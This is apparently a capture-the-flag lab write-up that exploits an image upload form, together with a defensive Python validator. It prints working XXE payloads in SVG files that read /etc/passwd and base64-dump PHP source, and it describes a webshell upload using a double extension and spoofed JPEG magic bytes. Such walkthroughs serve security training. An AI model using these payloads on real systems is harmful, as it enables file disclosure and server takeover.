# Skills Assessment

* Try to exploit the upload form to read the flag found at the root directory "/".

<figure><img src="/files/z84QRJRUhLQapx9bbCUp" alt=""><figcaption></figcaption></figure>

On the main site I can see a section named /contact/ where I can upload an image (screenshot), but in its source code I can see a whitelist -->

<figure><img src="/files/S5yrZOb5c9pXA4cEih06" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TtPr98vU0lfqgxPRm06Y" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/K1bpDwCeS5va1pGDvzuO" alt=""><figcaption></figcaption></figure>

> Intercept this request with Burp Suite -->

## XXE

<figure><img src="/files/SWGJUtkkPh0AtpKdsd9Z" alt=""><figcaption></figcaption></figure>

Try changing the extension to .svg - IT WORKS! - Then I need to test the Content-Type for XML / SVG

```
grep svg /usr/share/seclists/Discovery/Web-Content/web-all-content-types.txt

image/svg+xml
application/vnd.oipf.dae.svg+xml
```

<figure><img src="/files/2tR2sxEOT1PEBy20qNNo" alt=""><figcaption></figcaption></figure>

Into the file body, insert the malicious XML -->

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
```

<figure><img src="/files/gRNYiOTzsu65FdW4Wmjl" alt=""><figcaption></figcaption></figure>

With that working, we can use other payloads, for example to view the index.php of this site -->

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```

<figure><img src="/files/TIyF3nVQv9h7MpRAVMH8" alt=""><figcaption></figcaption></figure>

We can see the content of index.php base64 encoded; with it we can enumerate other endpoints of the site, for example upload.php

<figure><img src="/files/lv1KjzoefhZnGqJ8itt6" alt=""><figcaption></figcaption></figure>

> Decode the base64

<figure><img src="/files/ElIpyMwIiBNa41SwcWiB" alt=""><figcaption></figcaption></figure>

Alright!! With it we can see that the path where the files/images are saved is `/user_feedback_submissions/`, probably `contact/user_feedback_submissions/`. We can also see how the saved images are renamed:

```
$fileName = date('ymd') . '_' . basename($_FILES["uploadFile"]["name"]);
```

> date('ymd') \_ name of the uploaded file

With that, I can test with a simple upload whether I can view the picture -->

<figure><img src="/files/eUfzidTZUQsfabkjc0xv" alt=""><figcaption></figcaption></figure>

## WebShell Upload

First, again, remove the front-end restrictions -->

<figure><img src="/files/Yc903leba0QOdSR8I5Tu" alt=""><figcaption></figcaption></figure>

Then, with Burp active, intercept the request that uploads an image and send it to Repeater:

<figure><img src="/files/8RxCRELpWNMFFqIKoBNF" alt=""><figcaption></figcaption></figure>

We can upload a simple webshell, but... we need to test every combination of content-type, magic numbers and extensions.

First, we modify the extension to see which ones get through -->

<figure><img src="/files/CahXY49VysZK1dMLT3Bo" alt=""><figcaption></figcaption></figure>

> ws.phar.jpg - double extension, nice! We can use Intruder

Second, we need to insert malicious code, for example a web shell, and try to upload it. The safest approach: take a normal webshell and alter the content-type and MIME type -->

<figure><img src="/files/bhC4nRZrEDKHZ08cRhyS" alt=""><figcaption></figcaption></figure>

> With it, we can see that the correct content type is jpg or jpeg and the magic numbers are those of JPEG images

Finally, we can see the uploaded content base64 encoded. And with the other vulnerability, XXE, we can view the path where the images are saved: `contact/user_feedback_submissions/date(ymd)_name of upload file` -->

<figure><img src="/files/mIQVIahvb7M7EnCWxopJ" alt=""><figcaption></figcaption></figure>
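A hardened counterpart to the upload handler analysed above, as an added example that is not code from the assessment target: it whitelists only the final extension, refuses a dangerous extension anywhere in the name (the ws.phar.jpg case), checks magic bytes against that extension, rejects XML/SVG and PHP markup inside the body, and stores the file under a random name instead of the predictable date('ymd') + original-name scheme. The function name, the lists and the sample inputs are my own assumptions.

```python
import os
import re
import secrets

# Accepted raster formats: final extension -> magic bytes the body must start with.
# SVG is deliberately absent: it is XML, and an XML parser will expand its entities.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions that may never appear anywhere in the name, so ws.phar.jpg is refused
# even though its final extension is on the whitelist.
DANGEROUS_EXTS = {"php", "phar", "phtml", "php3", "php4", "php5", "phps", "pht", "htaccess"}
# Heuristic scan for markup that has no business inside a raster image.
MARKUP = re.compile(rb"<\?php|<\?=|<\?xml|<!DOCTYPE|<!ENTITY|<svg", re.IGNORECASE)


def validate_upload(original_name: str, content: bytes) -> tuple:
    """Return (True, storage_name) for an accepted file, or (False, reason)."""
    base = os.path.basename(original_name)  # drop any directory component
    parts = base.lower().split(".")
    if len(parts) < 2 or not all(parts[1:]):
        return False, "missing or empty extension"
    exts = parts[1:]
    if DANGEROUS_EXTS & set(exts):
        return False, f"executable extension in name: {base}"
    ext = exts[-1]
    if ext not in ALLOWED:
        return False, f"extension not allowed: .{ext}"
    if not content.startswith(ALLOWED[ext]):  # startswith accepts a tuple of prefixes
        return False, f"magic bytes do not match .{ext}"
    if MARKUP.search(content):
        return False, "script or XML markup found inside image body"
    # Random name: the date('ymd') + original-name scheme is predictable and lets the
    # uploader locate the file; a random name keeps the stored path unguessable.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed samples: an SVG carrying an external entity, and a JPEG header stub.
    xxe = b'<?xml version="1.0"?><!DOCTYPE svg [ <!ENTITY x SYSTEM "file:///etc/passwd"> ]><svg>&x;</svg>'
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
    for name, body in [("shot.svg", xxe), ("shot.jpg", xxe), ("ws.phar.jpg", jpeg),
                       ("ws.jpg", jpeg + b"<?php echo 1; ?>"), ("photo.JPG", jpeg)]:
        print(name, validate_upload(name, body))
```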

